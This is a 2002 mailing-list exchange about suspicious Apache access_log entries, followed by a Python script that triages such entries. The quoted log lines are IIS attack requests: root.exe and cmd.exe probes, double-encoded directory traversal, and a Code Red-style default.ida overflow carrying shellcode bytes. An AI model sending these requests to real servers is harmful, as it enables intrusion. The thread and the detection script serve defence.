Apache logs -- hack -- security
Tomas Valousek
xvalous at pluto.pslib.cz
Tuesday February 19 19:45:24 CET 2002
On Tue, 19 Feb 2002 adam_1 at centrum.cz wrote:
> Hello linux,
>
> Good day, when I was going through the Apache logs today I came across
> some things that look rather suspicious to me. Would there be anyone
> here who could tell me who was attempting what? And possibly whether
> something like this can be used to get hold of /bin/bash (I don't want
> to say root, because another user is enough and through that user it is
> a matter of a few hours to get to root). In case it is possible to get
> in this way, what is the defense?
> I found this in the file /var/log/httpd/access_log
> ----------------------------------------------------------------------------------
> 212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
> 213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322 "-" "-"
These are several ways of getting into IIS (that's that whatsit from
those people for that thing). This definitely cannot endanger Linux ;-).
BTW: if you enter part of that request into Google, it will find more
detailed information about these things.
--
Tomas -VALY- Valousek
web design, internet projects, linux etc..
email: tomas at valousek.cz
www: http://www.pslib.cz/~xvalous (~=ALT+126)
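
A triage sketch for the kind of access_log entries quoted in this thread, added here as an example and not part of the original post: it decodes the double percent-encoding (%255c), flags the IIS-targeted request shapes, and reports from the status code whether Apache actually served anything. The signature list, the documentation IP addresses and the placeholder query string are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Assumed signature list, built only from the request shapes quoted in the thread.
IIS_PROBES = {
    "root.exe": re.compile(r"/root\.exe$", re.I),
    "cmd.exe": re.compile(r"/cmd\.exe$", re.I),
    "default.ida": re.compile(r"/default\.ida$", re.I),
}

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash becomes visible."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def triage(line):
    """Return a finding dict for an IIS-style probe, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = fully_decode(m["target"].split("?", 1)[0]).replace("\\", "/")
    status = int(m["status"])
    for name, rx in IIS_PROBES.items():
        if rx.search(path):
            # A 2xx answer would mean the server actually served the target.
            return {"host": m["host"], "probe": name, "traversal": "../" in path,
                    "status": status, "served": 200 <= status < 300}
    return None

# Constructed sample lines (documentation IPs, placeholder query), same shapes as above.
SAMPLE = [
    '192.0.2.10 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"',
    '192.0.2.11 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"',
    '192.0.2.12 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?PLACEHOLDER HTTP/1.0" 400 322 "-" "-"',
    '192.0.2.13 - - [19/Feb/2002:12:00:00 +0100] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for finding in filter(None, map(triage, SAMPLE)):
        print(finding)
```

Every finding with "served": False (the 404 and 400 answers) is a probe the server rejected; a finding with "served": True is the one that would need a closer look.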